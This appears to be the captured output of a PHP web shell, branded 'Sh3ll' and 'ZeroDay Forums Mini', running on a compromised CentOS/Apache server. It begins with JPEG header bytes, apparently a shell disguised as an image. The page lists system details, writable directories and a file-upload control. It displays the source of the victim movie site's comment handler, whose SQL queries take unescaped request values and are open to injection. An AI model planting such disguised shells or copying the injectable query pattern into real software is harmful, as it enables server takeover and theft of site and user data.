ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/netphim/code/ajax/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/netphim/code/ajax/send_comment.php
<?php
$phim_id = $CORE->input['phim_id'] ?? 0;
$epi  = $CORE->input['epi'] ?? 0;
$name = $CORE->input['name'] ?? '';
$user_id = $CORE->input['user_id'] ?? 0;
$comment_id = $CORE->input['comment_id'] ?? 0;
$content = $CORE->input['content'] ?? '';
$content = html_entity_decode(html_entity_decode($content));
$content = strip_tags($content, "<img><br><p>");
$user_id_reply = $parent_id = 0;$user_id_reply_name='';
if($comment_id>0){
    $r_comment = $DB->fetch_row($DB->query("SELECT * FROM tb_comment WHERE comment_id='$comment_id'"));
    $user_id_reply = $r_comment['user_id_post'];
    $user_id_reply_name = $r_comment['user_id_post_name'];
    $parent_id = $comment_id;
}
if($name!='' and $user_id==$ob_user->user_id){
    $q_bankw = $DB->query("SELECT * FROM tb_bankw ORDER BY bankw_name");
    $arr_bad_word = array();
    while($r_bankw = $DB->fetch_row($q_bankw)){
        $arr_bad_word[] = $r_bankw['bankw_name'];
    }
    $txt_status = 'active';
    if(badWords(html_entity_decode($content),$arr_bad_word)){
        $txt_status = 'locked';
    }
    $r_phim = $DB->fetch_row($DB->query("SELECT * FROM tb_phim WHERE phim_id='$phim_id' "));
    if($epi<0){
        $epi_name=$epi_slug='';
    }else {
        $r_epi = $DB->fetch_row($DB->query("SELECT server_data FROM tb_epi WHERE phim_id='$phim_id' "));
        $arr_data = json_decode($r_epi['server_data'], true);
        $epi_name = $arr_data[$epi]['name'];
        $epi_slug = $arr_data[$epi]['slug'];
    }
    $DB->query("UPDATE tb_guest SET guest_fullname='$name' WHERE user_id='".$user_id."' ");
    $DB->query("UPDATE tb_guest SET guest_fullname='$name' WHERE user_id='".$user_id."' ");
    $arr_insert = array('parent_id'=>$parent_id,'phim_id'=>$phim_id,'phim_name'=>$r_phim['name'],'phim_slug'=>$r_phim['slug'],'epi'=>$epi,'epi_name'=>$epi_name,'epi_slug'=>$epi_slug,'user_id_post'=>$user_id,'user_id_post_name'=>$name,'user_id_img'=>$ob_user->guest_avatar,'user_id_reply'=>$user_id_reply,'user_id_reply_name'=>$user_id_reply_name,'comment_content'=>$content,'like_num'=>0,'dislike_num'=>0,'have_report'=>0,'time_post'=>time(),'comment_status'=>$txt_status);
    $comment_id_insert = $DB->do_insert('tb_comment',$arr_insert);
    $r_count = $DB->fetch_row($DB->query("SELECT count(*) as total FROM tb_comment WHERE phim_id='$phim_id' "));
    $DB->query("UPDATE tb_phim SET phim_hitcomment='".$r_count['total']."' WHERE phim_id='$phim_id' ");

}
if($comment_id==0){
    $arr['comment_id_insert'] = $comment_id_insert;
}else{
    $arr['comment_id_insert'] = $comment_id;
}
$arr['comment_status'] = $txt_status;
echo json_encode($arr);
exit();
?>

ZeroDay Forums Mini